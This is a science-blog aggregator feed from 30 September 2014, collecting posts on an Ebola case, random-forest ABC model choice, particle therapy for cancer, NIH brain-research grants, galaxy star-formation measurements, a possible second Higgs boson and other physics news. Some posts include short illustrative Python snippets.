“I have no doubt that we will control this importation, or case of Ebola, so that it does not spread widely in this country,” Frieden said. “It does reflect the ongoing spread of Ebola in Liberia and West Africa where there are a large number of cases.”

Frieden said further that doctors were considering providing experimental treatments to the patient such as injections of blood or serum from other Ebola survivors.

“That’s being discussed with the hospital and family now and if appropriate, they would be provided to the extent available,” Frieden said.

Few other details about the patient were provided, though officials did say that he is “ill and in intensive care”.


by Erika Check Hayden at September 30, 2014 10:49 PM

Christian P. Robert - xi'an's og

ABC model choice via random forests [expanded]

Today, we arXived a second version of our paper on ABC model choice with random forests. Or maybe [A]BC model choice with random forests, since the random forest is built on a simulation from the prior predictive and no further approximation is used in the process, except for the computation of the posterior [predictive] error rate. The update wrt the earlier version is that we ran massive simulations throughout the summer, on existing and new datasets. In particular, we have included a Human dataset extracted from the 1000 Genomes Project, made of 51,250 SNP loci. While this dataset is not used to test new evolution scenarios, we compared six out-of-Africa scenarios, with a possible admixture for Americans of African ancestry. The scenario selected by the random forest procedure posits a single out-of-Africa colonization event with a secondary split into European and East Asian population lineages, and a recent genetic admixture between African and European lineages for Americans of African origin. The procedure reported a high level of confidence, since the estimated posterior error rate is equal to zero. The SNP loci were carefully selected using the following criteria: (i) all individuals have a genotype characterized by a quality score (GQ)>10, (ii) polymorphism is present in at least one of the individuals, in order to fit the SNP simulation algorithm of Hudson (2002) used in DIYABC V2 (Cornuet et al., 2014), (iii) the minimum distance between two consecutive SNPs is 1 kb, in order to minimize linkage disequilibrium between SNPs, and (iv) SNP loci showing significant deviation from Hardy-Weinberg equilibrium at a 1% threshold in at least one of the four populations have been removed.

In terms of random forests, we optimised the size of the bootstrap subsamples for all of our datasets. While this optimisation requires extra computing time, it is negligible when compared with the enormous time taken by a logistic regression, which is [yet] the standard ABC model choice approach. Now that the data have been gathered, it is only a matter of days before we can send the paper to a journal.
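The core of the procedure, stripped of all the population-genetics machinery, can be sketched with standard-library Python. This toy stand-in uses an ensemble of one-split stumps in place of a proper random forest, and invented Gaussian models in place of DIYABC’s SNP simulations; it only illustrates the idea of classifying observed summary statistics against a reference table simulated from the prior predictive:

```python
import random
import statistics

random.seed(42)

def simulate(model):
    """One draw from a toy model's prior predictive, reduced to summary
    statistics (mean, standard deviation). Both models and their priors
    are invented here purely for illustration."""
    mu = random.uniform(-2, 2) if model == 1 else random.uniform(1, 3)
    data = [random.gauss(mu, 1.0) for _ in range(50)]
    return (statistics.mean(data), statistics.stdev(data))

# Reference table simulated from each model's prior predictive
table = [(simulate(m), m) for m in (1, 2) for _ in range(500)]

def stump(sample):
    """A one-split 'tree' grown on a bootstrap subsample: pick a random
    feature and threshold, assign the majority model index to each side."""
    feat = random.randrange(2)
    thr = random.choice(sample)[0][feat]
    left = [m for (s, m) in sample if s[feat] <= thr] or [1]
    right = [m for (s, m) in sample if s[feat] > thr] or [1]
    majority = lambda ms: max(set(ms), key=ms.count)
    return (feat, thr, majority(left), majority(right))

# The crude 'forest': many stumps, each on its own bootstrap subsample
forest = [stump(random.choices(table, k=200)) for _ in range(300)]

def classify(summaries):
    """Model choice by majority vote over the ensemble."""
    votes = [(l if summaries[f] <= t else r) for (f, t, l, r) in forest]
    return max(set(votes), key=votes.count)

# Classify a pseudo-observed dataset actually generated under model 2
chosen = classify(simulate(2))
print(chosen)
```

The paper's actual procedure additionally calibrates the subsample size and reports a posterior predictive error rate; none of that is attempted here.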

Filed under: Statistics, University life Tagged: 1000 Genomes Project, ABC, ABC model choice, admixture, bootstrap, DIYABC, Human evolution, logistic regression, out-of-Africa scenario, posterior predictive, prior predictive, random forests

by xi'an at September 30, 2014 10:14 PM

Symmetrybreaking - Fermilab/SLAC

Accelerating the fight against cancer

As charged-particle therapies grow in popularity, physicists are working with other experts to make them smaller, cheaper and more effective—and more available to cancer patients in the United States.

Once physicists started accelerating particles to high energies in the 1930s, it didn’t take them long to think of a killer app for this new technology: zapping tumors.

Standard radiation treatments, which had already been around for decades, send X-rays straight through the tumor and out the other side of the body, damaging healthy tissue both coming and going. But protons and ions—atoms stripped of electrons—slow when they hit the body and come to a stop, depositing most of their destructive energy at their stopping point. If you tune a beam of protons or ions so they stop inside a tumor, you can deliver the maximum dose of radiation while sparing healthy tissue and minimizing side effects. This makes it ideal for treating children, whose developing bodies are particularly sensitive to radiation damage, and for cancers very close to vital tissues such as the optic nerves or spinal cord.
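The depth at which a proton stops grows steeply with beam energy. A common textbook approximation, the Bragg-Kleeman rule with parameters for water (my addition, not used in the article), gives a feel for the numbers:

```python
# Bragg-Kleeman rule: R ~ alpha * E^p, an approximate power-law fit for
# protons stopping in water, with alpha ~ 0.0022 cm and p ~ 1.77 (E in MeV).
# Real treatment planning uses measured depth-dose data, not this formula.
ALPHA, P = 0.0022, 1.77

def proton_range_cm(energy_mev):
    """Approximate stopping depth in water for a proton beam."""
    return ALPHA * energy_mev ** P

def energy_for_depth_mev(depth_cm):
    """Invert the rule: the beam energy needed to stop at a given depth."""
    return (depth_cm / ALPHA) ** (1.0 / P)

# A ~150 MeV beam stops at roughly 15-16 cm, deep enough for most tumours
depth = proton_range_cm(150.0)
print(round(depth, 1))
```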

Today, nearly 70 years after American particle physicist Robert Wilson came up with the idea, proton therapy has been gaining traction worldwide and in the United States, where 14 centers are treating patients and nine more are under construction. Ions such as carbon, helium and oxygen are being used to treat patients in Germany, Italy, China and Japan. More than 120,000 patients had been treated with various forms of charged-particle therapy by the end of 2013, according to the Particle Therapy Co-Operative Group.

New initiatives from the CERN research center in Europe and from the Department of Energy and the National Cancer Institute in the United States are aimed at moving the technology along, assessing its strengths and limitations and making it more affordable.

And physicists are still deeply involved. No one knows more about building and operating particle accelerators and detectors. But there’s a lot more to know. So they’ve been joining forces with physicians, engineers, biologists, computer scientists and other experts to make the equipment smaller, lighter, cheaper and more efficient and to improve the way treatments are done.

“As you get closer to the patient, you leave the world accelerator physicists live in and get closer to the land of people who have PhDs in medical physics,” says Stephen Peggs, an accelerator physicist at Brookhaven National Laboratory.

“It’s alignment, robots and patient ergonomics, which require just the right skill sets, which is why it’s fun, of course, and one reason why it’s interesting—designing with patients in mind.”

Knowing where to stop

The collaborations that make charged-particle therapy work go back a long way. The first experimental treatments took place in 1954 at what is now Lawrence Berkeley National Laboratory. Later, scientists at Fermi National Accelerator Laboratory designed and built the circular accelerator at the heart of the first hospital-based proton therapy center in the United States, opened in 1990 at California’s Loma Linda University Medical Center.

A number of private companies have jumped into the field, opening treatment centers, selling equipment and developing more compact and efficient treatment systems that are designed to cut costs. ProTom International, for instance, recently received US Food and Drug Administration approval for a system that’s small enough and light enough to ship on a plane and move in through a door, so it will no longer be necessary to build the treatment center around it. Other players include ProCure, Mevion, IBA, Varian Medical Systems, ProNova, Hitachi, Sumitomo and Mitsubishi.

The goal of any treatment scheme is to get the beam to stop in exactly the right spot; the most advanced systems scan a beam back and forth to “paint” the 3-D volume of the tumor with great precision. Aiming it is not easy, though. Not only is every patient’s body different—a unique conglomeration of organs and tissues of varying densities—but every patient breathes, so the target is in constant motion.

Doctors use X-ray CT scans—the CT stands for “computed tomography”—to make a 3-D image of the tumor and its surroundings so they can calculate the ideal stopping point for the proton beam. But since protons don’t travel through the body exactly the same way X-rays do—their paths are shifted by tiny, rapid changes in the tissues they encounter along the way—their end points can differ slightly from the predicted ones.

Physicists are trying to reduce that margin of error with a technology called proton CT.

There are 49 charged-particle treatment centers operating worldwide, including 14 in the United States, and 27 more under construction. This map shows the number of patients treated through the end of 2013 in centers that are now in operation. Source: Particle Therapy Co-Operative Group.

Artwork by: Sandbox Studio, Chicago with Shawna X.

Reconnoitering with proton CT

The idea is simple: Use protons rather than X-rays to make the images. The protons are tuned to high enough energies that they go through the body without stopping, depositing about one-tenth as much radiation along their path as X-rays do. 

Detectors in front of and behind the body pinpoint where each proton beam enters and leaves, and a separate detector measures how much energy the protons lose as they pass through tissues. By directing proton beams through the patient from different angles, doctors can create a 3-D image that tells them, much more accurately than X-rays, how to tune the proton beam so it stops inside the tumor.

Two teams are now in friendly competition, testing rival ways to perform proton CT on “phantom” human heads made of plastic. Both approaches are based on detectors that are staples in particle physics.

One team is made up of researchers from Northern Illinois University, Fermilab, Argonne National Laboratory and the University of Delhi in India and funded by the US Army Medical Research Acquisition Center in Maryland. They use a pair of fiber trackers on each side of the phantom head to pinpoint where the proton beams enter and exit. Each tracker contains thousands of thin plastic fibers. When a proton hits a fiber, it gives off a flash of light that is picked up by another physics standby—a silicon photomultiplier—and conveyed to a detector.

The team is testing this system, which includes computers and software for turning the data into images, at the CDH Proton Center in Warrenville, Illinois.

“The point is to demonstrate you can get the image quality you need to target the treatment more accurately with a lower radiation dose level than with X-ray CT,” says Peter Wilson, principal investigator for the Fermilab part of the project.

The second project, a collaboration between researchers at Loma Linda, University of California, Santa Cruz, and Baylor University, is financed by a $2 million grant from the National Institutes of Health. Their proton CT system is based on silicon strip detectors the Santa Cruz group developed for the Fermi Gamma-ray Space Telescope and the ATLAS experiment at CERN, among others. It’s being tested at Loma Linda.

“We know how to detect charged particles with silicon detectors. Charged particles for us are duck soup,” says UCSC particle physicist Hartmut Sadrozinski, who has been working with these detectors for more than 30 years. Since a single scan requires tracking about a billion protons, the researchers also introduced software packages developed for high-energy physics to analyze the high volume of data coming into the detector.

Proton CT will have to get a lot faster before it’s ready for the treatment room. In experiments with the phantom head, the system can detect a million protons per second, completing a scan in about 10 minutes, Sadrozinski says; the goal is to bring that down to 2 to 3 minutes, reducing the time the patient has to hold still and ensuring accurate images and dose delivery.

Trimming the size and cost of ion therapy

The first ion therapy center opened in Japan in 1994; by the end of 2013 centers in Japan, China, Germany and Italy had treated nearly 13,000 patients.

There’s reason to think ions could be more effective than protons or X-rays for treating certain types of cancer, according to a recent review of the field published in Radiation Oncology by researchers from the National Cancer Institute and Walter Reed National Military Medical Center. Ions deliver a more powerful punch than protons, causing more damage to a tumor’s DNA, and patient treatments have shown promise.

But the high cost of building and operating treatment centers has held the technology back, the researchers wrote; and long-term research on possible side effects, including the possibility of triggering secondary cancers, is lacking.

The cost of building ion treatment centers is higher in part because the ions are so much heavier than protons. You need bigger magnets to steer them around an accelerator, and heavier equipment to deliver them to the patient.

Two projects at Brookhaven National Laboratory aim to bring the size and cost of the equipment down.

One team, led by accelerator physicist Dejan Trbojevic, has developed and patented a simpler, less expensive gantry that rotates around a stationary patient to aim an ion beam at a tumor from various angles. Gantries for ion therapy can be huge—the one in use at the Heidelberg Ion-Beam Therapy Center in Germany weighs 670 tons and is as tall as a jetliner. The new design shrinks the size of the gantry by making a single set of simpler, smaller magnets do double duty, both bending and focusing the particle beam.

In the second project, Brookhaven scientists are working with a Virginia company, Best Medical International, to design a system for treating patients with protons, carbon ions and other ion beams. Called the ion Rapidly Cycling Medical Synchrotron (iRCMS), it is designed to deliver ions to patients in smaller, more rapid pulses. With smaller pulses, the diameter of the beam also shrinks, along with the size of the magnets used to steer it. Brookhaven is building one of the system’s three magnet girders, radio-frequency acceleration cavities and a power supply for a prototype system. The end product must be simple and reliable enough for trained hospital technicians to operate for years.

“A particle accelerator for cancer treatment has to be industrial, robust—not the high-tech, high-performance, typical machine we’re used to,” says Brookhaven’s Peggs, one of the lead scientists on the project. “It’s more like a Nissan than a Ferrari.”

Artwork by: Sandbox Studio, Chicago with Shawna X.

Launching a CERN initiative for cancer treatment

CERN, the international particle physics center in Geneva, is best known to many as the place where the Higgs boson was discovered in 2012. In 1996 it began collaborating on a study called PIMMS (the Proton-Ion Medical Machine Study) that designed a system for delivering both proton and ion treatments. That system evolved into the equipment at the heart of two ion therapy centers: CNAO, the National Center for Oncological Treatment in Pavia, Italy, which treated its first patient in 2011, and MedAustron, scheduled to open in Austria in 2015.

Now scientists at CERN want to spearhead an international collaboration to design a new, more compact treatment system that will incorporate the latest particle physics technologies. It’s part of a larger CERN initiative launched late last year with a goal of contributing to a global system for treating cancer with charged-particle beams.

Part of an existing CERN accelerator, the Low Energy Ion Ring, will be converted into a facility to provide various types of charged-particle beams for research into how they affect healthy and cancerous tissue. The lab will also consider developing detectors for making medical images and controlling the treatment beam, investigating ways to control the dose the patient receives and adapting large-scale computing for medical applications.

CERN will provide seed funding and seek out other funding from foundations, philanthropists and other sources, such as the European Union.

“Part of CERN’s mission is knowledge transfer,” says Steve Myers, director of the medical initiative, who spent the past five years running the Large Hadron Collider as director of accelerators and technology for CERN.

“We would like to make the technologies we have developed for particle physics available to other fields of research simply because we think it’s a nice thing to do,” he says. “All the things we do are related to the same goal, which is treating cancer tumors in the most effective and efficient way possible.”

Expanding the options in the US

In the US, the biggest barrier to setting up ion treatment centers is financial: Treatment centers cost hundreds of millions of dollars. Unlike in Europe and Asia, no government funding is available, so these projects have to attract private investors. But without rigorous studies showing that ion therapy is worth the added cost in terms of eradicating cancer, slowing its spread or improving patients’ lives, investors are reluctant to pony up money and insurance companies are reluctant to pay for treatments.

Studies that rigorously compare the results of proton or ion treatment with standard radiation therapy are just starting, says James Deye, program director for medical physics at the National Cancer Institute’s radiation research program.

The need for more research on ion therapy has caught the attention of the Department of Energy, whose Office of High Energy Physics oversees fundamental, long-term accelerator research in the US. A 2010 report, “Accelerators for America’s Future,” identified ion therapy as one of a number of areas where accelerator research and development could make important contributions to society.

In January 2013, more than 60 experts from the US, Japan and Europe met at a workshop sponsored by the DOE and NCI to identify areas where more research is needed on both the hardware and medical sides to develop the ion therapy systems of the future. Ideally, the participants concluded, future facilities should offer treatment with multiple types of charged particles—from protons to lithium, helium, boron and carbon ions—to allow researchers to compare their effectiveness and individual patients to get more than one type of treatment.

In June, the DOE’s Accelerator Stewardship program asked researchers to submit proposals for seed funding to improve accelerator and beam delivery systems for ion therapy.

“If there are accelerator technologies that can better enable this type of treatment, our job is to apply our R&D and technical skills to try to improve their ability to do so,” says Michael Zisman, an accelerator physicist from Lawrence Berkeley National Laboratory who is temporarily detailed to the DOE Office of High Energy Physics.

“Ideally we hope there will be partnerships between labs, industry, universities and medical facilities,” he says. “We don’t want good technology ideas in search of a problem. We rather want to make sure our customers are identifying real problems that we believe the application of improved accelerator technology can actually solve.”


Like what you see? Sign up for a free subscription to symmetry!

by Glennda Chui at September 30, 2014 07:20 PM

The Great Beyond - Nature blog

NIH awards $46 million for brain-research tools

Just 18 months after the White House announced the Brain Research through Advancing Innovative Neurotechnologies (BRAIN) Initiative, the US National Institutes of Health has awarded its first US$46 million in grants for the programme.

“We have referred to this as a moonshot,” said NIH director Francis Collins at a 30 September press conference. “To me, as someone who had the privilege of leading the Human Genome Project, this sort of has the same feel as October 1990, when the first genome centres were announced.”

The 58 NIH grants, which range in size from about $300,000 to $1.9 million, will support more than 100 researchers. According to Story Landis, director of the National Institute of Neurological Disorders and Stroke, the NIH received more than 300 grant applications, and ended up spending $6 million more than it had anticipated in order to fund as many of these grants as possible.

The awards address research priorities included in the NIH’s 10-year plan for the BRAIN Initiative; most will support the development of new tools to monitor the brain, such as a wearable positron emission tomography (PET) scanner that could monitor a person’s brain activity as she goes about her day. Some of these tools could eventually be used for studying and treating human disorders; they include grants for imaging neurotransmitters such as dopamine in real time in a living brain, which Thomas Insel, director of the National Institute of Mental Health, says will be extremely useful for studying disorders such as depression. Other tools will be useful primarily for basic research, including many potential improvements on optogenetics – using light to control neuronal firing in animals.

“It’s a new era of exploration, an exploration of inner space instead of outer space,” says Cornelia Bargmann, a neurobiologist at Rockefeller University in New York. “We feel a little like Galileo looking at the sky through his telescope for the first time.”

The NIH’s master plan calls for $4.5 billion for BRAIN Initiative research over the next 10 years, a goal that will require support from Congress to increase the agency’s overall budget. To allay concerns that the BRAIN Initiative will detract from other NIH-funded research, Collins noted that the BRAIN funding request is dwarfed by the $5.5 billion the agency spends on neuroscience research annually.

The NIH is the last of the three agencies involved in BRAIN to announce its awards. The Defense Advanced Research Projects Agency, which received $50 million this year, has announced several multimillion-dollar grants for therapeutic applications such as brain stimulation to improve memory and prosthetic limbs controlled by brain activity. The National Science Foundation received $30 million and, in August, announced 36 small awards for basic research in topics such as brain evolution and ways to store data collected from brains.

Meanwhile, two additional federal agencies — the US Food and Drug Administration (FDA) and the Intelligence Advanced Research Projects Activity (IARPA) — are set to join the effort, the White House announced on 30 September.

The FDA will be working with the other agencies to enable the development of medical and research devices that could be used in humans. IARPA will be joining BRAIN with several of its own ongoing research programmes, including an effort to develop new artificial intelligence systems based on the brain’s network patterns and a study on the use of brain stimulation to increase human problem-solving ability. According to the White House, the total investment in BRAIN Initiative research this year by government and private funding sources, such as the Kavli Foundation, totals more than $300 million.

by Sara Reardon at September 30, 2014 07:15 PM

Emily Lakdawalla - The Planetary Society Blog

More LightSail Day-in-the-Life Multimedia, and a Community Image Processing Challenge
We have more multimedia from LightSail's day-in-the-life test, as well as a request for some community image processing help.

September 30, 2014 06:07 PM

astrobites - astro-ph reader's digest

Measuring Galaxy Star Formation

Astronomers constantly try to use what we can observe now to deduce facts about the past. The star formation rate (SFR) and the star formation history (SFH) are two of the key components used to describe and understand the evolution of galaxies. The star formation rate is the total mass of stars formed per year, often given as solar masses per year. The star formation history is how stars formed over time and space, whether in short bursts or over longer periods. Both of these are important quantities that help characterize the history of galaxies. For example, it is thought, though still debated, that the Milky Way had several bursts of star formation in the past and the current star formation rate is around one solar mass per year.

Most measurements of the star formation history assume that stars formed at a constant rate over the past 100 Myr. This assumption might hold for spiral galaxies evolving in isolation. However, the star formation history for a galaxy that underwent violent mergers in the past is likely to be much more complicated. This paper seeks to understand whether 100 Myr is a fair assumption. By modeling galaxies with different star formation histories, the authors compare the simulated SFR with what astronomers would measure.

Astronomers use five main methods to measure the SFR. Each measures the flux at different wavelengths to back out the recent star formation. The most massive stars are brightest in the UV, so studying either the far or near UV flux (FUV and NUV) constrains the recent formation of massive stars, which dominate the SFR. The same approach has been applied using the U band flux. Studying the total IR emission works in a similar fashion: these very hot stars heat dust grains, which re-radiate the energy in the IR. Finally, the Lyman continuum emission ionizes the hydrogen in star forming regions, which can be traced through specific recombination lines.
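For scale, the widely used Kennicutt (1998) FUV calibration (my addition; the post does not quote a specific conversion) maps UV luminosity directly to an SFR, and a systematic overestimate translates into a simple correction factor:

```python
# Kennicutt (1998) FUV calibration, assumed here rather than taken
# from the post:  SFR [Msun/yr] ~ 1.4e-28 * L_nu [erg/s/Hz]
def sfr_from_fuv(l_nu_erg_s_hz):
    """Star formation rate in solar masses per year from FUV luminosity."""
    return 1.4e-28 * l_nu_erg_s_hz

# A galaxy with L_nu = 1e28 erg/s/Hz would be forming ~1.4 Msun/yr
measured = sfr_from_fuv(1.0e28)

# If a method overestimates the true SFR by, say, 40 per cent,
# the corrected value is simply measured / 1.4
corrected = measured / 1.4
print(measured, corrected)
```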

The authors used a simulation called MIRAGE to simulate 23 different galaxies, a combination of merging and isolated galaxies. The galaxies varied in initial mass, orientation, and initial gas fraction, chosen to represent galaxies between redshifts of 1 and 2. The simulations were run for 800 Myr at 1 Myr timesteps, and a simulated spectrum was made for each galaxy at each timestep. This allowed the authors to compare the simulated SFR with different commonly used methods for measuring the SFR from spectral information.


Figure 1: The calculated SFR as a function of age compared to the known SFR from the simulation. Black is the known SFR. Magenta is from the Lyman continuum method. Blue is the Far UV measurement. Cyan is the near UV measurement. Green is the U band measurement. Red is the total IR measurement.

Figure 1 shows the simulated and measured SFRs between 350 Myr and 450 Myr; the results from this time segment are representative of the rest of the simulation. The true SFR is shown in black, while all the other curves are various methods of measuring the SFR from the simulated spectra. The Lyman continuum method (magenta) follows the true SFR quite well. All other methods overestimate the SFR by 25 to 65 per cent.

The authors then seek to understand why the SFR would be significantly overstated in so many of these measurements. Many stars will live longer than 100 Myr. These stars will still contribute flux to the measurements, but will bias them because they do not represent the actual star formation over the past 100 Myr. Correcting for these long-lived stars reduces the overestimate of the SFR in the various methods down to 10 per cent.

With this in mind, the authors advise that the method used to measure the SFR should be carefully chosen based on the type of galaxy being studied. The authors suggest that a longer timescale, of order 1 Gyr rather than 100 Myr, be used for isolated galaxies to account for contamination from older stellar populations. Star-bursting galaxies with rapid, ongoing star formation permit instead shorter timescales as the contribution from these older populations will be fractionally smaller.

These results help put measured star formation rates in real galaxies in perspective. Most methods discussed in this paper overestimate the true SFR, and quantifying that overestimate helps astronomers calibrate the role the SFR plays as galaxies evolve over time, and how star formation eventually shuts down.

by Josh Fuchs at September 30, 2014 02:58 PM

Christian P. Robert - xi'an's og

The chocolate factory gone up in smoke

There was a major fire near my house yesterday, with many fire-engines rushing by and a wet smoke smell lingering the whole night. As I found out during my early morning run, the nearby chocolate factory had completely burned. Actually, sixteen hours after the beginning of the fire, the building was still smouldering, with a dozen fire-engines yet on site and huge hoses running on adjacent streets. A fireman told me the fire had started from an electric spark and that the entire reserves had been destroyed. This is quite sad, as it hits a local business and a great chocolate maker, Patrick Roger. I do not know whether or not the company will survive this disaster, but if you happen to come by one of the shops in Paris or Brussels, drop in and buy some chocolates! For the taste of it and as a support.

Filed under: Kids, Running Tagged: chocolate, fire, Patrick Roger, Sceaux

by xi'an at September 30, 2014 02:52 PM

Lubos Motl - string vacua and pheno

Glimpsed second Higgs at \(137\GeV\) OK with BLSSM, not MSSM
Fifteen months ago, I discussed a very interesting paper by CMS that has seen a 2.73-sigma or 2.93-sigma (depending on details) excess suggesting the existence of a second CP-even neutral Higgs boson at mass \(m_{h'}=136.5\GeV\).
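For orientation, a quoted local significance of this size corresponds to a one-sided Gaussian tail probability of a few per mille; a minimal conversion sketch:

```python
import math

def one_sided_p(sigma):
    """One-sided Gaussian tail probability for a significance in sigma."""
    return 0.5 * math.erfc(sigma / math.sqrt(2.0))

for s in (2.73, 2.93):
    print(f"{s} sigma  ->  local p-value ~ {one_sided_p(s):.2e}")
```

This is the local p-value only; a global significance would be lower once the look-elsewhere effect over the scanned mass range is accounted for.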

Three months later, I mentioned some weak dilepton evidence in favor of this new particle. Today, W. Abdallah, S. Khalil, and S. Moretti released a hep-ph preprint that tests the incorporation of this hypothetical second Higgs boson into supersymmetric models:
Double Higgs peak in the minimal SUSY \(B-L\) model
It may be the most interesting paper on the arXiv today.

They perform some detailed analysis and conclude that the Minimal Supersymmetric Standard Model, or MSSM, isn't compatible with all these data. However, one extremely simple and well-motivated extension of the MSSM, the BLSSM – the \(B-L\) Supersymmetric Standard Model – seems to agree perfectly.

It is a model that (or to say the least, whose spectrum) you may consider to be a low-energy limit of the \(SO(10)\) grand unified theories (GUT) – which seem more attractive and supported by the data than the minimal \(SU(5)\) GUTs, anyway, e.g. because of suggestive neutrino patterns, love of David Gross :-), a simple incorporation to heterotic string theory, and other reasons.

The BLSSM has an extra right-handed neutrino supermultiplet in each generation of fermions; recall that in \(SO(10)\) GUTs, they are coming naturally from the \({\bf 16}\) spinorial representation responsible for all the quarks and leptons, including the right-handed neutrinos. A seesaw mechanism may be naturally combined with this spectrum to produce the observed small neutrino masses – something that is less natural or at least less explicit in the MSSM.
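As a reminder of the seesaw logic (the standard type-I form, not anything specific to this paper): with a Dirac mass \(m_D\) coupling the left- and right-handed neutrinos and a large Majorana mass \(M_R\) for the right-handed one, diagonalizing the mass matrix yields one light and one heavy eigenvalue,

```latex
% Type-I seesaw, schematic one-generation form
M_\nu = \begin{pmatrix} 0 & m_D \\ m_D & M_R \end{pmatrix},
\qquad
m_{\rm light} \simeq \frac{m_D^2}{M_R}, \qquad
m_{\rm heavy} \simeq M_R \qquad (m_D \ll M_R),
```

so the observed neutrino masses are driven down precisely because \(M_R\) is large.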

There's also the \(U(1)_{B-L}\) gauge field with its gauge bosons and gauginos. Recall that if you embed \(U(5)=U(1)\times SU(5)\) into \(SO(10)\), this difference of the baryon and lepton numbers arises as the extra \(U(1)\).

Finally, the BLSSM contains some extra neutral Higgs supermultiplet. It also increases the natural expected masses of the Higgs bosons relative to the MSSM, which reduces the "small amount of fine-tuning" or "small hierarchy problem" that is apparently present in the MSSM.

ATLAS hasn't told us whether it sees the resonance near \(137\GeV\) as well. It could be very interesting because such a newly discovered particle would be not only a strong piece of evidence in favor of SUSY but also in favor of grand unification – and in fact, a prettier, non-minimal version of it!

And imagine the excitement that the second \(137\GeV\) Higgs boson would bring to all the numerologists obsessed with the fine-structure constant.

I am promising you absolutely nothing but stay tuned. ;-)

Director Rolf Heuer celebrates CERN's 60th birthday with a gesture he learned from his granddad. Congratulations!

P.S.: I made a search for papers and talks that would mention a \(137\GeV\) Higgs boson. Remarkably, ATLAS has seen a small excess in the diphoton channel around \(137\GeV\) as well, see e.g. pages 10 and 16 of these slides. The \(137\GeV\) Higgs boson appears six times in these older slides, too. See also this August 2012 paper on these two bosons. In 2011, \(137\GeV\) was also the upper bound on the Higgs mass imposed by the Tevatron but as far as I see, there was no bump over there – just a monotonic curve for the probability that crossed a threshold.

by Luboš Motl at September 30, 2014 02:44 PM

Quantum Diaries

High school students advance particle physics and their own science education at Fermilab

This article appeared in Fermilab Today on Sept. 30, 2014.

Illinois Mathematics and Science Academy students Nerione Agrawal (left) and Paul Nebres (right) work on the Muon g-2 experiment through the Student Inquiry and Research program. Muon g-2 scientist Brendan Kiburg (center) co-mentors the students. Photo: Fermilab

Illinois Mathematics and Science Academy students Nerione Agrawal (left) and Paul Nebres (right) work on the Muon g-2 experiment through the Student Inquiry and Research program. Muon g-2 scientist Brendan Kiburg (center) co-mentors the students. Photo: Fermilab

As an eighth grader, Paul Nebres took part in a 2012 field trip to Fermilab. He learned about the laboratory’s exciting scientific experiments, said hello to a few bison and went home inspired.

Now a junior at the Illinois Mathematics and Science Academy (IMSA) in Aurora, Nebres is back at Fermilab, this time actively contributing to its scientific program. He’s been working on the Muon g-2 project since the summer, writing software that will help shape the magnetic field that guides muons around a 150-foot-circumference muon storage ring.

Nebres is one of 13 IMSA students at Fermilab. The high school students are part of the academy’s Student Inquiry and Research program, or SIR. Every Wednesday over the course of the school year, the students use these weekly Inquiry Days to work at the laboratory, putting their skills to work and learning new ones that advance their understanding of the STEM fields.

The program is a win for both the laboratory and the students, who work on DZero, MicroBooNE, MINERvA and electrical engineering projects, in addition to Muon g-2.

“You can throw challenging problems at these students, problems you really want solved, and then they contribute to an important part of the experiment,” said Muon g-2 scientist Brendan Kiburg, who co-mentors a group of four SIR students with scientists Brendan Casey and Tammy Walton. “Students can build on various aspects of the projects over time toward a science result and accumulate quite a nice portfolio.”

This year roughly 250 IMSA students are in the broader SIR program, conducting independent research projects at Argonne National Laboratory, the University of Chicago and other Chicago-area institutions.

IMSA junior Nerione Agrawal, who started in the SIR program this month, uses her background in computing and engineering to simulate the potential materials that will be used to build Muon g-2 detectors.

“I’d been to Fermilab a couple of times before attending IMSA, and when I found out that you could do an SIR at Fermilab, I decided I wanted to do it,” she said. “I’ve really enjoyed it so far. I’ve learned so much in three weeks alone.”

The opportunities for students at the laboratory extend beyond their particular projects.

“We had the summer undergraduate lecture series, so apart from doing background for the experiment, I learned what else is going on around Fermilab, too,” Nebres said. “I didn’t expect the amount of collaboration that goes on around here to be at the level that it is.”

In April, every SIR student will create a poster on his or her project and give a short talk at the annual IMSAloquium.

Kiburg encourages other researchers at the lab to advance their projects while nurturing young talent through SIR.

“This is an opportunity to let a creative person take the reins of a project, steward it to completion or to a point that you could pick up where they leave off and finish it,” he said. “There’s a real deliverable outcome. It’s inspiring.”

Leah Hesla

by Fermilab at September 30, 2014 01:58 PM

Peter Coles - In the Dark

The Origin of CERN

Since CERN, the Geneva home of the Large Hadron Collider, is currently celebrating its 60th Anniversary, I thought I would use this organ to correct a widespread misapprehension concerning the true historical origin of that organization. I have to say the general misunderstanding of the background to CERN is not helped by the information produced locally, which insists that CERN is an acronym for Conseil Européen pour la Recherche Nucléaire and that it came into being in 1954. This may be the date at which the Geneva operation commenced, but the organization has a far older origin than that.

CERN is in fact named after the Dorset village of Cerne Abbas, most famous for a prehistoric hill figure called the Cerne Abbas Giant. The following aerial photograph of this outstanding local landmark proves that the inhabitants of Dorset had the idea of erecting a large hardon facility hundreds of years ago…

by telescoper at September 30, 2014 01:10 PM

ZapperZ - Physics and Physicists

2014 Nobel Prize Prediction
As is customary at this time of the year, everyone is anticipating the announcement out of Sweden of this year's Nobel Prize award. Of course, there has been some guessing about who will receive the prestigious prize. Science Watch has made its own predictions this year. Interestingly enough, all of their candidates are from the Materials Science/Condensed Matter field. Maybe this is to balance out the fact that last year's winners were from elementary particle/high energy physics theory.


by ZapperZ at September 30, 2014 12:46 PM

Peter Coles - In the Dark

Poetic Words: Dannie Abse


I don’t usually post about poetry two days running, but circumstances seem to justify a reblog of the poem Three Street Musicians by the wonderful Welsh poet Dannie Abse, who died on Sunday.

Originally posted on A Few Reasonable Words:

Tipped by BBC Radio’s Words and Music on the legend of Orpheus, found this wonderful poem by the Welsh poet Dannie Abse.

Three Street Musicians

Three street musicians in mourning overcoats
worn too long, shake money boxes this morning,
then, afterwards, play their suicide notes.

The violinist in chic, black spectacles, blind,
the stout tenor with a fake Napoleon stance,
and the looney flautist following behind,

they try to importune us, the busy living,
who hear melodic snatches of musichall
above unceasing waterfalls of traffic.

Yet if anything can summon back the dead
it is the old-time sound, old obstinate tunes,
such as they achingly render and suspend:

‘The Minstrel Boy’, ‘Roses of Picardy’.
No wonder cemeteries are full of silences
and stones keep down the dead that they defend.

Stones too light! Airs unresistible!
Even a dog listens, one paw raised, while the stout,
loud man amazes with…

View original 48 more words

by telescoper at September 30, 2014 12:33 PM

Tommaso Dorigo - Scientificblogging

Top Mass: CMS Again On Top!
I wonder how interesting it can be to an outsider to learn that the mass of the sixth quark is now known to 0.38% accuracy, thanks to the combination of measurements of that quantity performed by the CMS experiment at CERN. In fact, the previously best measurement was the one recently published by the DZERO collaboration at Fermilab, which has a relative 0.43% accuracy. "So what" - you might say - "this 14% improvement does not change my life". That's undeniably true.
